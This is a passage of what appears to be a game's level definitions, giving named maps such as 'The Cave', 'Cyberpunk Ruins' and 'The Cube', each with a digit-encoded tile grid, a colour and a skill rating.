'color_ff8844-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000044400000000000000000000000000000000000000_00000000000000000000000000000000000004444444000000000000000000000000000000000000_00000000000000000000000000000000000044444444400000000000000000000000000000000000_00000000000000000000000000000000000044444444400000000000000000000000000000000000_00000000000000000000000000000000000444444444440000000000000000000000000000000000_00000000000000000000000000000000000444444444440000000000000000000000000000000000_00000000000000000000000000000000000444441444440000000000000000000000000000000000_00000000000000000000000000000000000044411144400000000000000000000000000000000000_00000000000000000000000000000000000044111114400000000000000000000000000000000000_00000000000000000000000000000000000001114111000000000000000000000000000000000000_00000000000000000000000000000000000011144411100000000000000000000000000000000000_00000000000000000000000000000000000111000001110000000000000000000000000000000000_00000050000000000000000000000000001110000000111000000000000000000000000000000000_00000555000000000000000000000000011100000000011100000000000000000000000000000000_00005555500000000000000000000000111000111110001110000000000000000000000000000000_00055000550000000000000000000001111000111110001111000000000000000000000000000000_00550000055000000000500000000011141000015100001411100000000000000000000000000000_05500000005500000005050000000111440000015100000441110000000000000000000000000000_55000000000550000050005000001114400000010100000044111000000000000000000000000000_50000000000055000500000500011144000000010100000004411100000000000000000000000000_00000000000005505000000000111440000000010100000000441110000000000000000000000000_00000000000000550000000001114400001001110111001000044111000000001000000001000000_00000000000000055000000011144000011101000101011100004411100000011100000011100000_00000000000000005500000111140000011111010101111100000411110000011100000011100000_00000000000000000550001111100004411144010104411144000011111000011100000011100000_00000000000000000000011111100004411144010104411144000011111100011100000011100000_00000000000000000000111411100001111111010101111111000011141115511100000011100000_00000000000000000001114411100001111111010101111111000011144111511100000011100000_00000000000000000011144010000004411144010104411144000000104411111100000011100000_00000000000000000111440010100004411144010104411144000010100441111100000011100000_00000000000000001114400010100000011100010100011100000010100044111100000011100000_00000000000000011144000000100000011101110111011100000010000004411100000011100000_00000000000000111140000011100000011101110111011100000011100000411110000011100000_00000000000001111100000011100000011100010000011100000011100000011111555511150000_00000000000011111100000011100000011100010100011100000011100000011111155511155000_00000000000111411111100011100011111101110111011111100011100011111111111111111100_00000000001114411111100011100011111101500051011111100011100011111111111111111100_00000000011144000001100011100011000001500051000001100011100011000000000000001100_00000000111440000000000011100000000001500051000005500011100000000000000000000000_02000001114400011100000011100000000001503051000055500511150000011111111111100000_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 12,\n ),\n Map.new(\n name: 'The Cave',\n data: 'color_7a7a94-00000000000000000000000011111111111111111111111111111111111111111111111111111111_00000000000000000000001111111111111111111111111111111111111111111111111111111111_00000000000000000111111111111111111111111111111111111111111111111111111111111111_00000000000000001111111111111111111111111111111111111111111111111111111111111111_00000000000000011111111111555111111111111111111111111111111111111111111111055111_00000000000000011115511155055100000100011111111111111111111100000000000000005511_00000000000000055000500000000000000000000000001000001000011001111111111110000511_00000000000000050000000000000000000000000000001000100000000011111111111111100011_00000000000000000000001000000000500000000000000000100000000111111111111111100111_00000000000000000000011000000005500100000051500000110015000011111111111111100111_00000000000111111111111111111111511111111111111101111111110001111111111111110111_02000011111111111111111111111111111111111111111101111111111000000111111111110111_11111111111111111111111111111111111111111111111101111111111110000000000051110111_11111111111111111111111111111111111111111111111101111111111111111111110555110111_11111111111111111111111111111111111111111111111101111111111111111111111155110111_11111111111111111111111110000001111111111111111101111100011111111111111151110111_11111111111111111111111114000001111111111111111101111001001111110111111111110111_11111111111111111111111114444001111111111111111101111001100001110001111111110111_11111111111111111111111114444400000000000100100000011011111100111110011111110111_11111111111111111111111114444001111111110000000400011011111110011111011111110111_11111111111111111111111114444441111111111444444444411011111110001111100111110111_11111111111111111111111111111111111111111111144414411011111110001111110011100111_11111111111111111111111111111111111111111111111111111011100000000000000000000111_11111111111111111111111111111111111111111111111111111011011111111111111111100111_11111111111111111111111111111111111111111111111111111000111111111111111111001111_11111111111111111111111111111111111111101111111111111101111111111111111100111111_11111111111111111111111111111111111111011111001111111100111111111111100011111111_11300001111111111111111111111111111110011111100111111101111111111155001111111111_11111101111111111111111111111111111111011111110111111101111111115511111111111111_11111100000000000000000000000000000000011111110111111101111111155511111111111111_11111111111110011111111111111111100111000111110111111101111111151111111111111111_11111111501111011111111111111111111111110001110111111101111111155511111111111111_11111155511111000011111111111111111111111000000111111101111111111551111111111111_11111551111111110011111111111111111111111011111111111101111111111111111111111111_11111511111111110511111111111111111111111011111111111101111111111111111111111111_11111111111111105551111111111110000000000000511111111101111111111111111111111111_11111111111111105555111111111000111111111111155011111101111111111111111111111111_11111111111111155555111111111001111111111111111151111101111111111111111111111111_11111111111111111111111111110011111111111111111551111101111111111111111111111111_11111111111111111111111111110111111111111111111151111101111111111111111111111111_11111111111100000110011111110111111111111111111111111101111111111111111111111111_11111111111100000000000011110111115111111111111111111101111111111111111111111111_11111111111044400000000011110111551111111111111111111101111111111111111111111111_11111111111444440000000000000000011111111111111111111501111111111111111111111111_11111111111444444400511111110111111111111111105115115505111151111111111111111111_11111111111111111111111111110111111115555111500150555505555551511115111111111111_11111111111111111111111111110111111115550511000150005500550051551105511111111111_11111111111111111111111111110111111115000051000500000500500051500100515111111111_11111111111111111111111111000111111110000051000500000000500005000000510511111111_11111111111111100000000000000000000000000005000000000000500005000000010511111111_11111111111111110011111111111111111000000005000000000000000000000000050011111111_11111111111111110111111111111111111000000000000000000000000000000000050011111111_11111111111111100111111111111111111000000000000000000000000000000000000011111111_11111111111111101111111115555511111100000000000000000444000000000000000001111111_11111111111111101111111111111551111110000000000000004444400000000000000000111111_11111111111111101111111111111151111111000000000000044444444000000000010005111111_11111111111111110005011111111151111111000000000000044444444440000001010005511111_11111111111111111111050050555551111111111001111104444111144444010001510055111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 13,\n ),\n Map.new(\n name: 'Cyberpunk Ruins',\n data: 'color_3399aa-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000111111110000000000000000000000000000_00000000000000000000000000000000000000000000000000100000000000000000000000000000_00000000000000000000000000000000000000111111111111111000000000000000000000000000_00000000000000000000000000000000000000010000000000000000000000000000000000000000_00000000000000000000000000000000000011111111111111111111000000000000000000004000_00000000000000000000000000000000000000010001000000100100000000000000000000044000_00000000000000000000000000000000011111110111111111110111111000000000000000044000_00000000000000000000000000000000000000010000000000000100000000000000000000044000_00000000000000000000000000000000000111110111111111110111000000000000000000044000_00000000000000000000000000000000000001110111000000010100000000000000000000011000_00000000000000000000000000000000000011110111100001110111000000000000000000011000_00000000000000000000000000000000000001500051000000114110000000000000000000011000_00000000000440000000000000000000000011103011100000114110000000000000000000111000_00000000000000000000004400000000000000111110000000114100000000000000000001111000_00000000000000000000000000000000000000044400000000114000000000000000000001111000_00000000000000000000000000000000000000000000000000114010000000000000000001111000_00000002000000000000000000004400000000000000000000104110000000000000000001001000_00000011111111111110000000000000000000000000000000014110000000000000000111111110_00000000111111110010000000000000000000000000000000114110000000000550000111001110_00000001111111111110000000000000000000000000000000114110000001111111111111111110_00000011111111110010000000000000001111111110000001114111000001144444444111001110_00000111111011111110000000000000001001100111000000010100000001100000000111111110_00001111111111110010000000000000001111111111100000010111114411100000000001001100_00011111111111110000000000000000001001111111110000010100000001100000000001001100_00111111111110010000000000000000000001111111111000010111144111100000000001001100_00111111111111110000000000000000000001111110011000010100000001100000000001001100_00110011111111110000000500000000000001111111111000010111441111100000101111111111_00111111111111110000005500000500001001101110011551010100000001100000100001001100_00110011111111111111111111111111111111111111111111011114411111100000110111111111_00111111111110010015555555555555001001111111011001010100000001100000110001001100_00111111111111111110050505555500001111111111111111011111441111100000111011111110_00111111111110010010050000550000001001111111011001010100000000000000111001001100_00111111111111110000000000500000001111111111111111011111144111110000111101111110_00110111101111110000000000500000051001101111111001010100000000000000100101001100_00111111111111110000000000000000051111111111111111010111114411111000111101111110_00111111111111110000000000000005551001100000011001010000000000000000100101001100_00111144444444111111111111111111111111111111111111011111111111111111111101111111_00111111111144111114440000000005551001100000000001000000000001100000100101001111_00111111111144110014400000000000551111100111111141011111114411114400000101111100_00111111110044111114000000000000051441100000011001005100000001100000000001001111_00110011110111110010000000000000051141110011111001005111144111111440000001111100_00111111110111111110000000000000001441100000011001005100000001100000000001001111_00000000000100110010000000000000000441111001111411011111441111111144000000111100_11111011111111111110000000000000000441100000011001000100000001100000000000001111_11111001111111110010000000000000000441111100111001000114411111111114400000011100_00110000000010110000000000000000000441100000011001000100000001100000000001001111_11110000000011110000000000000055000441111110011004000100000001100000000101001100_00110000000010110000000000055550000441100000011001000000000001100000000101001100_11111111110111111011111111111111111111111111011111111111111111111111111111101111_00110000000011000010000005555000001001100000011111000000000001100000011111101111_11110000000000011110000055000000001111104444000001000000000004400000000101001100_00110000000000110010005550000000001001100000011000000055000001100000000000001100_11111111111111111110055000000000001111111111111111111111111111111111111111111100_11111111101000110010000000000000001001111111111001000000000001100000000001001100_00110000000000110000000000000000000001111111111001000000000001100000000001001100',\n skill_mean: 15,\n ),\n Map.new(\n name: 'Steamport Town',\n data: 'color_ffbd7d-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000110011111111110000000000000440000000000001110000000000000000_00000000000000000001111115555555111000000000000110000000000011111000000000000000_00000000000000000001111111111111111000000000011111100000000111511100000000000000_00000000000000000000110011111111114000000000044114400000000111151100000000000000_00000000000000000000000000000110000400411111114114111111100111151100000000000000_00000000000000000000000000000000000044000000044114400000000111151100000000000000_00000000000000000000000000000000000000000000011111100000000011111000000000000000_00000000000040000000000000000000000000000000044114400000000041110000000000000000_00000000000010000000000000000000011100001111114114111111400400100000000000000000_00000000000014000000000000000000111110000000044114400000044001110000000000000000_00000000000011000000000000000001115111000000011111100000000001110000000000000000_00000000000011000000000000000001111511000000011111100000000000000000000000000000_00000000000011000000000000000001111511000001115115111000000000000000000000000000_00000000000010000000000000000001111511000001111111111000000000000000000000000000_00000000000010000000000000000000111110000000011111100000000000000000000000000000_00000000000010000000000000000000011140000000011111100000000000000000000000000000_00000000000114000000000000000000001004000000044114400000000000000000000000000000_00000000000114400000000000000000011100400411114114111100000000000000000000000000_00000000001111440000000000000000011100044000044114400000000000000000000000000000_00000000011111140000000000000000000000000000011111100000000000000000000000000000_00000000111001110000000000000000000000000000011111100000000000000000000000000000_00000001110000110000000000000000000000000000111111110000000000000000000000000000_00000011140000110000000000000000000000000001111111111000000000000000000000000000_00000111440000110000000000000000000000000001100000000000000000000000000000000000_00001110440000110000000000000000000000000001104440111100000000000000000000000000_00011100440000110000000000000000000000000001104440011000000000000000000000000000_00111000440000110000000000000000000000000001104444011000000000000000000000000000_00110000440000110000000000000000000000000001104444011000000000000000000000000000_02114000440000110000000000000000000000000001104444011000000000000000000000000000_01111100440000110000000000000000000000000001100000011000000000000000000000000000_01111111111100110000000000000000000400000011101111011100000000000000000000000000_00110000000000110000000000000000000100000111100110011110000000000000000000000000_00110000000000110000000000000000004140000111110110111110000000000000000000000000_00110000000000110000000000000000001110000001100110011000000000000000000000000000_00110000000000110000000000000000041114000001100000011000000000000000000000000000_00110000440000110000000000000000411111400001104444011000000000000000000000000000_00110000440000110000000000000004111111140001104444011000000000000000000000000000_00110000440000114000000000000001111111110001104444011000000000000000000000000000_00110000440000114000000000000000000000000001104444011000000000000000000000000000_00110001111111111000000000000000011111000001104444011000000000000000000000000000_00110000000011111000000000000000011111000001104444011000000000000000000000000000_00110000000000110000000000000000011441000001100000011000000000000000000000000000_00110000000000110000000000000000011441000001101111011000000000000000010000000000_00110000440000110000000000000000011441000001101111011000000000000000111000100000_00110000440000110000000000000000011441000001101111011000000000001000011101110000_01111100440000110000000000000000011441000001100000011000000000011100011100111000_01111111111000110000000000000000011441000111101111011110000000001100011100111000_00110000000000110000000000000000011441000111101111011110000000001100011100111000_00110000000000110000000000000000011000000411101111011140000000001100011000110000_00110000440000114404404404404404411000000441100000011440000000001100011000110000_00110000440011111111111111111111111011111111111011111111111100001000010000100000_00110011111111111111111111111111111011111111111011111110000000111000010000100300_00110000000000111111000000000111111400111111100011111100000000111444414441111110_00110000000000111100000000000001111410011111001011111000000000111111111111111000_01111100440000111000000000000000111411001110011011111555555555111111111111115555_01111111111000110000000000000000011411104140111011011555555555551111111111155555_00440000000000000011000000000110000000004440000000011555555555555555555555555555_11111111111111111111000000000111111111111111100000011111111111111111111111111111',\n skill_mean: 16,\n ),\n Map.new(\n name: 'Find the Dragon',\n data: 'color_ccff99-00000000000000000000000000000000000000000111111111111111111111111111111111111111_00000000000000000000001111110000000000000111111000000550000001111111111111111111_00000000000000000000011111100000000000001111111000000550000001111111111111111111_00000000000000000000111111000000010000011111111000000550000001111110111111111111_00000000000000000000111110000001111000111111111000000550000001111100010101111111_00000000000000000000011111000111010001110000000000005555000000000000000000111111_00000000000000000011001111111100000001100111111000000000000001111111000000111111_00000000000000000111111111110000000011001111111000000000000001111111111100001111_00000000000000000111111111000000000110011111111000005555000001111111111111000011_00000000000000000000010111000000000000111111110000000550000000011111111111100051_00000000000000000000000101300111111111111111110111111111111111011111111111110001_00000000000000000000111111111111111111111111110111111111111111011111111111111001_00000000000000000000001111111111111111111400000011111111111110000004111111110001_00000000000000000000000001111111111111111444400411111111111110004044111100010011_00000000000000000000000000000001111111111444444411111111111114444444111101000011_00000000000000000000000000000000011011111111111111111110001111111111111101100011_00000000000000000000000000000000001011111111111111001000000011111111111100150111_00000000000000000000000000000000000010001111111110000000000000111111111110111111_00000000000000000000000000000000000000000111111000000000000000010001111110111111_00000000000000000000000000000000000000000011000000000000000000010001101110011111_00000000000000000000000000000000000000000011000000000000000000000000101111001111_00000000000000000000000000000000000000000010000000000000000000000000000111001111_00000000000000000000000000000000000000000000000000000000000000000000000111000511_00000000000000000000000000000000000000000000000000000000000000000000000011000051_00000000000000000000000000000000000000000000000000000000000000000000000011100001_00000000000000000000000000000000000000000000000000000000000000000000000001100001_00000000000000000000000000000000000000000000000000000000000000000000000001100001_00000000000000000000000000000000000000000000000000000000000000000000000001110001_00000000000000000000000000000000000000000000000000000000000000000000000001110001_00000000000000000000000000000000000000000000000000000000000000000000000000155001_00000000000000000000000000000000000000000000000000000000000000000000000000115001_00000000000000000000000000000000000000000000000000000000000000000000000000015001_00000000000000000000000000000000000000000000000000000000000000000000000000010001_00000000000000000000000000000000000000000000000000000000000000000000000000010001_00000000000000000000000000000000000000000000000000000000000000001010000000010001_00000000000000000000000000000000000000000000000000000000000000011110000000011001_00000000000000000000000000000000000000000000000000000000000000110110000000001001_00000000000000000000000000000000000000000000000000000000000000111110000000001001_00000000000000000000000000000000000000000000000000000000001000000110100000001001_00000000000000000000000000000000000000000000000000000000001100111110110000001001_00000000000000000000000000000000000000011444400000000000000110001100110000011001_00000000000000000000000000000000000001111111140000000000000011111111110000010001_00000000000000000000000000000000000111111111140000000000000001101100110000110011_00000040000000000000000000000000000111111000040000000000000000001100110000110051_10000444000400000000000000000000001111110000040000000000000000011110110001110001_11000444000440000010000000000000011111100000040000000000000000011110000011111001_11100040004444000111000000000000011111100000040000000000000000111111100111110001_11111040000444001111100000000001111111100000040000000000000011111111111111100001_11111140000040011111110000000011111111100000040000000000001111111111111111100111_11111110000040001404100000001111111111100000040000000000001111111111111111100011_11111111100040001020000000111111111111100000040000000000011111111111111111100001_11111111111111111111111111111111111111100000000000000001111111110551151111110001_11111111111111111111111111111111111111100000040000000111111111000051051051111001_11111111111111111111111111111111111111100000000000000011111111050000050001000001_11111111111111111111111111111111111111100000040000000001111110050000000000000011_11111111111111111111111111111111111111100000000000000001111111550000000011100001_11111111111111111111111111111111111111110000040000000001111111155000011111115001_11111111111111111111111111111111111111114444444444444444441144111444111111111111_11111111111111111111111111111111111111111444444444444444444444444411111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 19,\n ),\n Map.new(\n name: 'Star Hopping',\n data: 'color_a3a3cc-00000000000000000000055500000000044444440000000000000000000000000000000000000000_00000000000000000055511115000004444444440000000000000000100000000000000000000000_00000000000000005511111111110444440044440000000000000000000000000000000000010000_00000300000000051111111111111144000044400000000000000000000000000000000000000000_00001110000000511111011111111110000044400000000000000000000000000000000000000000_00011111000005111111111001111111000444000000000000000000000000000001000000000000_00111111100001111011110000111111100444000000000000000000000000000011100000000000_00111111100051110011111001111111104440000000000000000000000000000001000000000000_00011111000011111111111111110011114440000000000000001000000000000000000000000000_00001110000011111111111111110111144400000000000000011100000000000000000000000000_00101010100011111111011111111111444400000000000000001000000000000000000000000000_00111111100111101111111111111114444000000001000000000000000000000000000010000000_00110001100111111111111111111144441000000000000000000000000000000000000111000000_00100000100111111111111111111144411000000000000000000000000000000000000010000000_00100000100111111111111111111444111000000000000000000000000000000000000000000000_00000000000011111111111111114444110000000000000000000000000000000000000000000000_00000000000011111111111111144441110000000000000000000000000000000000000000000000_00000000000011111111111111444411110000011000000000000000000010000000000000000000_00000000000001111111111114444111100000111100000000000000000111000000010000000000_00000000000041111111111144441111100000111100000000000000000010000000000000000000_00000000000444111111114444411111000000011000000000000000000000000000000000000000_00000100004440011111144444111110000000000000000000000010000000000000000000000000_00001110044400001111444411111100000000000000000000000111000000000000000000000000_00000100044000000144444111110000000000000000000000000010000000000000000000000000_00000000444000004444441110000000000010000000000000000000000000000000000000001000_00000000444004444444400000000000000000000000000000000000000000000100000000000000_00000004444444444440000000000000000000000000000100000000000000001110000000000000_00010004444444440000000000000000000000000000000000000000000000000100000000000000_00111000444400000000000011100000000000000000000000000010000000000000000000000000_00010000000000000000000111110000000000000000000000000000000000000000000000000000_00000000000000000000001110111000000000000000000000000000000000000000001000000000_00000000111000000000001111101000000000000000000000000000000000000000011100000000_00000001110100000000001111111000000000000000000000000000000000000000001000000000_00000001111100000000000111110000000000000000000000000000000000000000000000000000_00000001111100000000100011100000000000000000000000000000000000000000000000000000_00000000111000000001110000000000000000000000001000000000000000100000000000000000_00000000000000000000100000000000000000000000011100000000000001110000000000000000_00000000000000000000000000000000000000000000001000000000000000100000000000000000_00000000000000000000000000000000000000010000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000111000000000000000000000000_00000000000000000000000000000000000000000000000000011111110000000000000000000000_00000000000000000000000000000000000000000000000000111111111000000000000000000000_00000000000000000000000000000000000000000000000001111011111100000000000000000000_00000000000000000000000000000000000000000000000001111111111100000000000000000000_00100000000000000000000000000000000000000000000011101111111110000000000000000000_00000000000000000000000000000000000000000000000011111111111110000000000000000000_00000000000010000000000000000000000000000000000011111111111110000000011000000000_00000000000111000000000000000000000000000000000001111111111100000000111100000000_00000000001111100000000000000000000011000000000001111011111100000000111100000000_00000000000100000000000000000000000110100000000000111111111000000000011000000000_00000000000120111100000000000000000111100000000000011111110000000000000000000000_00000000000111111111100011000000000011000000000000000111000000000000000000000000_00000000011111111111111011111000000000000000000000000000000000000000000000000000_00000000111111111111011101110000000000000000011000000000000000000000000000000000_00000001111110111111111110110000000000000000111100000000000000000000000000000000_00000011111111111111110111100000000000000000111100000000000000000000000000000000_00000011111111111111111111000000000000000000011000000000000000000000000000000000_00000111111111111111111111100000000000000000000000000000000000000000000000000000_00000111111111111110111111100000000000000000000000000000000000000000000000000000',\n skill_mean: 22,\n ),\n Map.new(\n name: 'Shadow of Valus',\n data: 'color_ffeecc-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000050000000000000000000000000000000000000_00000000000000000000000000000000500000000010000000000000000000000000000000000000_00000000000000000000000000000000100000001010500000000000000000000000000000000000_00000000000000000000000000000010100000011110100000000000000000000000000000000000_00000000000000000000000000000011111111111111100000000000000000000000000000000000_00000000000000000000000000000111111111111111111000000000000000000000000000000000_00000000000000000000000000101111111111111111111111000000000000000000000000000000_00000000000000000000000000111111111111111111111111100000000000000000000000000000_00000000000000000000000000111111111111111111111111111100000000000000000000000000_00000000000000000000000001111111111111111111111111111111100000000000000000000000_00000000000000000000000011111111111111111111111111111111111500000000000000000000_00000000000000000000000011111111111111111111111111111111110000000000000000000000_00000000000000000000000111111111111111111111111111111111110000000000000000000000_00000000000000000000000111111111111111111111111111111111111000000000000000000000_00000000000000000000000111111111111111111111111111111111111000000000000000000000_00000000000000000000000111111111111111111111111111111111111100000000050000000000_00000000001000000000000111111111111111111111111111111111111111000000010500000000_00000000000000000000000011111111111111111111111111111111111111111000010100000000_00000000000000000000000011111111111111111111111111111111111111111110011100000000_00000000000000000000000001111111111111111111111111111111111111111111011110000000_00000000000000000510000001111111111111111111111111111111111111111111111111000000_00000000000000000011000001111111011111101111111111111111111111111111111111100000_00000000000000000010000000111111111111111111111111111111111111111111111111100000_00000000000000000000000000111111111111111111111111111111111111111111111111110000_00000000000000000000000000111111111111111111111111111111111111111111111111110000_00000000000000000000001000111111111111111111111111111111111111111111111111110000_00000000100000000000000000111111111111111111111111111111111111111111111111110000_00000000000000000000000000411111111111111111111111111111111111111111111111115000_00000000000000000000000000411111111111111111111111111111111111111111111111115000_00000000000000000000000000041111111111111111111111111111111144411111111111115000_00000000000000000001000000041111111111111111111111111114444444441111111111110000_00000000000000000001100000004411111111111111111111111114000000004111111111110000_00000000000000000005100050000441111111111111111111111300000000000441111111110000_00110000000000000005100005000411111111111111111111111110000000000041111111100000_00111000000000000005000000000111111111111111111111111111000000000011111111110000_00511000000000000000000000000111111111111111111111111111100000000011111111110000_00015000000010000000000000001111111111111111111111111111100000000001111111100000_00010000000000000000000001111111111111111111111111111111100000000011111111110000_00000000000000000000000000111111111111111111111111111111100000000001111111100000_00000000000000000000000001111111111111111111111111111111100000000011111111100000_00000000000000000000000011111111111111111111111111111111100000000111111111100000_00000000000000000000001111111111111111111111111111111111100000011111111111110000_00000000000000000000000111111111111111111111111111111111110000011111111111110000_00000000000000000000000111111111441111111111111111111111110000111111111111111000_00000000000001111000000111111111444111111111111111111111110000111111111111111000_00000000000005110000001111111110004111111111110111111111110000111100111111111000_00000000000000510000001111111111004111111111000111111111110000111100111111111000_00000000000000010000001111111111004111111110000111111111110000111001111111111000_00000000000000000000001111111111004111111110000111111111110000011111111111110000_00000000000000000000001111111111001111111110000011111111100000000111111111100000_00000000000000000000000111111111001111111100000011111111100000000111111111000000_00000000000000000000000111111111001111111000000011111111100000000001111110000000_00000021100000000011000011111100001111111000000001111111110000000000000000000000_00000111000000000050000000000000011111111000000001111111110000000000000000000000_00000101000005500000050000000000011111111000000000111111111000000000000000000000_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 25,\n ),\n Map.new(\n name: 'The Cube',\n data: 'color_d2eed7-11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111110001000111111000000001111110000000011111100000000111111000000021_11111111111111110101010111111000000001111110000000011111100000000111111000000001_11111111111111110101010111111005555001111110055550011111100000000111111004444001_11111111111111114141414111111005555001111110055550011111100000000111111004444001_11111111111111114141414111111005555001111110055550011111100004444111111004444001_11111111111111110101010111111005555001111110055550011111100004444111111004444001_11111111111111110101010111111000000001111110000000011111100004444111111000000001_11111111111111130100010111111000000001111110000000011111100004444444000000000001_11111111111111111111110111111111111111111111111111111111111111114444000011111111_11111111111111100044000111111111111111111111111111111111111111114444000011111111_11111111111111101111111111111111111111111111111111111111111111114444000011111111_11111111111111100044000111111111111111111111111111111111111111110000000011111111_11111111111111111111110111111111111111111111111111111111111111110000000011111111_11111111111111100044000111111111111111111111111111111111111111110000000011111111_14444444411111101111111111111000000001111110000000011111100000000000000000000001_14411114411111100044000111111000000001111110000000011111100000000111111000000001_14111111411111111111110111111005555001111110044440011111100000000111111000000001_14151151411111100044000111111005555001111110044440011111100000000111111000000001_14111111411111101111111111111005555001111110044440011111100005555111111000055551_14114411411111100044000111111005555001111110044440011111100005555111111000055551_14444444411111111111110111111000000001111110000000011111100005555111111000055551_14444444000000000000000111111000000000000000000000011111100005555555000000055551_11111111000000001111111111111111111100000000111111111111111111115555000011111111_11111111000000001111111111111111111100444400111111111111111111115555000011111111_11111111000000001111111111111111111100444400111111111111111111115555000011111111_11111111000000001111111111111111111100444400111111111111111111110000000011111111_11111111000000001111111111111111111100444400111111111111111111110000000011111111_11111111000000001111111111111111111100000000111111111111111111110000000011111111_11111111000000000000000111111000000000000000000000011111111111110000000000055551_11111111111111100000000111111000000001111110000000011111111111111111111000055551_11111111111111100000000111111004444001111110000000011111111111111111111000055551_11111111111111100000000111111004444001111110000000011111111111111111111000055551_11111111111111100005555111111004444001111110000555511111111111111111111000000001_11111111111111100005555111111004444001111110000555511111111111111111111000000001_11111111111111100005555111111000000001111110000555511111111111111111111000000001_11111111000000000005555555000000000001111110000555555500001111110000000000000001_11111111000000001111115555000011111111111111111111555500001111110000000011111111_11111111000000001111115555000011111111111111111111555500001111110000000011111111_11111111000055551111115555000011111111111111111111555500001111110000000011111111_11111111000055551111110000000011111111111111111111000000001111110000555511111111_11111111000055551111110000000011111111111111111111000000001111110000555511111111_11111111000055551111110000000011111111111111111111000000001111110000555511111111_11111111000000000000000000000000000001111110000000000000000000000000555555500001_11111111111111100000000111111000000001111110000000011111100000000111111555500001_11111111111111100555500111111004444001111110044440011111100000000111111555500001_11111111111111100555500111111004444001111110044440011111100000000111111555500001_11111111111111100555500111111004444001111110044440011111155550000111111555500001_11111111111111100555500111111004444001111110044440011111155550000111111000000001_11111111111111100000000111111000000001111110000000011111155550000111111000000001_11111111111111100000000111111000000000000000000000011111155550000000000000000001_11111111111111111111111111111111111100000000111111111111111111110000000011111111_11111111111111111111111111111111111100000000111111111111111111110000000011111111_11111111111111111111111111111111111100000000111111111111111111110000000011111111_11111111111111111111111111111111111100000000111111111111111111110000000011111111',\n skill_mean: 27,\n ),\n Map.new(\n name: 'Temple City',\n data: 'color_cfcfe6-00000000000000000000000000000000000000000000000000000000000000000000000000000002_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000044000000000000000000000000000_00000000000000000000000000000000000000000000111111144000000000000000000000111111_00000055000000000000000000000000000000000005511111111000000000000000011111111111_00000000550000000000000444000000000000055555511111111000000000005555111111111111_00000000055500000000000044400000000000555555551111111000000000000055555555511111_00000000000550000000000000000000000000000000055551111000000000000000000005555111_00000000005555555000001111111111000000000000000000000000000000000000000000000000_00000000000005555555511111111100000000000000000000000000000000000000440000000000_00000000000000055555511111111000000000000000000000000000555111111111440000000000_00000000000000000005551111110000000000000000000000000055555511111111110000000000_55500000000000000000055111000000000000000000000000000000005555111111110000000000_05555511100000000000000000000000000000000000000000000000000055551110000000000000_00051111000000000000000000011100000000000000000000000000000000000000000000000000_00005110000000000000000000551100000005511110000000000000000000050550000000000000_00000000000000000000000000000000000000051100000000000000000005555555000050000000_00000000000000000000000000000000055500000000000000000000000555555555555500000000_00000000000000000055551100555555555555000000000000000000555550005005055550050000_00000000000010100000555555555055101555505550000000000505550050000000005555555005_00000000000110110000555555500001101100555555550550055555550000000000000000555555_00000000000110110055550000000001101100005555555555555555500000000000000000005505_00000000011110111155500000000111101111000000550005555500000000000000000000000555_00000000011500051150000000000115000011000000000005550000000000000000000000000005_00000000011500551150000000000000000511000000000055500000000000000000000000000000_00000555011500051100000000005110000511000000005055000000000000000000000000000000_50555551111100111111100055111111100111110000000550500000000000000000000000000000_55055551150001151441100005114415110000110000005500000000000000000000000000000000_55550551150011551441100000114415511000110000555500000000000000000000000000000000_55555551100110051441100000114415001100110055555000000000000000000000000000000000_55000001100000001441100000114410000000110005550000000000000000000000000000000000_00000001111000001441100000114410000011115555550000000000000000000000000000000000_00000001101100001441100000114410000115115555000000000000000000000000000000000500_00000001100110000001100000110000001155115000000000000000000000000000000000005500_00000001111111011111100000111111011151115000000000000400400400000000000055505000_00000001100400001441100000114410000555150000000000000101110100000000000050550000_00000001100400001441150000114410000555510000000000000111511100000000000000055550_00000001104440001441150000114410005550115000000000040001510004000000000000005550_00000001100400001441100000114410005500115500000000010111511101000000000005505050_000000011000000014411500001